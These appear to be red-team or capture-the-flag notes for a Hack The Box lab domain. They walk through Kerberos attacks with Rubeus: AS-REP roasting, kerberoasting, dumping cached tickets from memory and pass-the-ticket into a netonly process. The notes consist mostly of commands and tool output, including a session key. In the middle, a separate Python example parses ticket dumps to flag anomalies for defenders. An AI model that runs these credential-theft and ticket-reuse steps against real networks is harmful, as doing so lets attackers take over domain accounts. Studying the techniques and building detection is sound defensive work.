Kerberos

Kerberos (AS-REP)

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap

Kerberos (SPN)

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

Kerberos Tickets

Kerberos tickets are digital credentials used to authenticate users on a network. Instead of sending passwords, Kerberos issues a TGT (Ticket Granting Ticket) when a user authenticates. This TGT lets the user obtain service tickets to access specific resources without entering their password again. Each ticket has a limited lifetime to improve security.

Extract Kerberos Ticket

Kerberos tickets can be extracted directly from memory whenever a logon session has one cached. We can use Rubeus to do this.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)

[*] Current LUID    : 0x56a09

 ----------------------------------------------------------------------------------- 
 | LUID     | UserName         | Service                   | EndTime               |
 ----------------------------------------------------------------------------------- 
 | 0xa901f  | DC01$ @ PAY.HTB  | krbtgt/PAY.HTB            | 2/27/2025 11:16:10 AM |
 | 0x11725b | DC01$ @ PAY.HTB  | ldap/DC01.PAY.HTB         | 2/27/2025 11:16:10 AM |
 | 0x56a09  | sqlsvc @ PAY.HTB | krbtgt/pay.htb            | 2/27/2025 5:19:27 PM  |
 -----------------------------------------------------------------------------------

Extract the Kerberos ticket.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /service:krbtgt /luid:0x56a09 /nowrap
[*] Target service  : krbtgt
[*] Target LUID     : 0x56a09
[*] Current LUID    : 0x56a09

  UserName                 : Administrator
  Domain                   : PAY
  LogonId                  : 0x56a09
  UserSID                  : S-1-5-21-2839822896-2191592306-2017040813-500
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2/27/2025 1:16:16 AM
  LogonServer              : DC01
  LogonServerDNSDomain     : PAY.HTB
  UserPrincipalName        : Administrator@PAY.HTB


    ServiceName              :  krbtgt/pay.htb
    ServiceRealm             :  PAY.HTB
    UserName                 :  sqlsvc (NT_PRINCIPAL)
    UserRealm                :  PAY.HTB
    StartTime                :  2/27/2025 7:19:27 AM
    EndTime                  :  2/27/2025 5:19:27 PM
    RenewTill                :  3/6/2025 7:19:27 AM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  rc4_hmac
    Base64(key)              :  p+00GKftjtwU74EZQtMW3g==
    Base64EncodedTicket   :

      doIFODCCBTSgAwIBBaEDAgEWooIEXjCCBFphggRW...........
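The dump above carries everything a defender needs to sanity-check a cached ticket: the logon session it lives in, the principal it was issued to, its lifetime, renewal window and key type. The following is an added example (not part of these notes and not Rubeus code) that parses Rubeus dump-style output and flags the anomalies a reviewer would look for. The embedded sample is constructed from the output shown on this page, with the key and ticket blob left out; the 10-hour ticket lifetime and 7-day renewal limits it compares against are the Active Directory default Kerberos policy values and are passed in as assumed parameters.

```python
import re
from datetime import datetime

# Constructed sample modelled on the Rubeus "dump" output shown above.
# Key material and the ticket blob are omitted; the placeholder is not a real ticket.
SAMPLE_DUMP = """\
[*] Target service  : krbtgt
[*] Target LUID     : 0x56a09
[*] Current LUID    : 0x56a09

  UserName                 : Administrator
  Domain                   : PAY
  LogonId                  : 0x56a09
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  UserPrincipalName        : Administrator@PAY.HTB

    ServiceName              :  krbtgt/pay.htb
    ServiceRealm             :  PAY.HTB
    UserName                 :  sqlsvc (NT_PRINCIPAL)
    UserRealm                :  PAY.HTB
    StartTime                :  2/27/2025 7:19:27 AM
    EndTime                  :  2/27/2025 5:19:27 PM
    RenewTill                :  3/6/2025 7:19:27 AM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  rc4_hmac
    Base64EncodedTicket   :

      TICKET_BLOB_PLACEHOLDER
"""

TS_FORMAT = "%m/%d/%Y %I:%M:%S %p"          # Rubeus prints US-style timestamps
FIELD_RE = re.compile(r"^( +)(\w+)\s*:\s*(.*)$")  # "  Key   : value" lines only


def parse_dump(text):
    """Split dump output into the logon-session block (2-space indent)
    and a list of ticket blocks (4-space indent, each starting at ServiceName)."""
    session, tickets = {}, []
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:                      # "[*] ..." status lines and the blob are skipped
            continue
        indent, key, value = len(m.group(1)), m.group(2), m.group(3).strip()
        if indent == 2:
            session[key] = value
        elif indent == 4:
            if key == "ServiceName":
                tickets.append({})
            if tickets:
                tickets[-1][key] = value
    return session, tickets


def ticket_timing(ticket):
    """Return (lifetime in hours, renewal window in days) for one ticket block."""
    start = datetime.strptime(ticket["StartTime"], TS_FORMAT)
    end = datetime.strptime(ticket["EndTime"], TS_FORMAT)
    renew = datetime.strptime(ticket["RenewTill"], TS_FORMAT)
    return (end - start).total_seconds() / 3600, (renew - start).total_seconds() / 86400


def principal(name):
    """'sqlsvc (NT_PRINCIPAL)' -> 'sqlsvc'."""
    return name.split(" ")[0].lower()


def review_dump(text, max_ticket_hours=10, max_renew_days=7):
    """Flag tickets whose lifetime, key type or principal look wrong for the session.
    Limits default to the AD Kerberos policy defaults (assumed, adjust per domain)."""
    session, tickets = parse_dump(text)
    session_user = principal(session.get("UserName", ""))
    findings = []
    for t in tickets:
        svc = t.get("ServiceName", "?")
        life_h, renew_d = ticket_timing(t)
        if life_h > max_ticket_hours:
            findings.append(f"{svc}: lifetime {life_h:.1f}h exceeds policy {max_ticket_hours}h")
        if renew_d > max_renew_days:
            findings.append(f"{svc}: renewal window {renew_d:.1f}d exceeds policy {max_renew_days}d")
        if t.get("KeyType", "").startswith("rc4"):
            findings.append(f"{svc}: RC4 session key (etype 23); AES is expected for a TGT in a hardened domain")
        ticket_user = principal(t.get("UserName", ""))
        if ticket_user != session_user:
            findings.append(f"{svc}: ticket for '{ticket_user}' cached in logon session of '{session_user}'")
    return findings


if __name__ == "__main__":
    for finding in review_dump(SAMPLE_DUMP):
        print(finding)
```

On the sample this reports two findings: the RC4 session key, and a TGT for sqlsvc sitting in a logon session that belongs to Administrator, which is exactly the mismatch the dump above exhibits. The lifetime (10h) and renewal window (7d) are within the assumed policy and are not reported.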

We create a new process with its own logon session (logon type 9, NewCredentials).

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[*] Action: Create Process (/netonly)


[*] Using random username and password.

[*] Showing process : False
[*] Username        : KG7VU7UW
[*] Domain          : PB2T3FGC
[*] Password        : GTHOXJHA
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 2328
[+] LUID            : 0x86bcff

We can import the ticket into the newly created process.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x86bcff /ticket:doIFODCCBTSgAwIBBaEDAg......
[*] Action: Import Ticket
[+] Ticket successfully imported!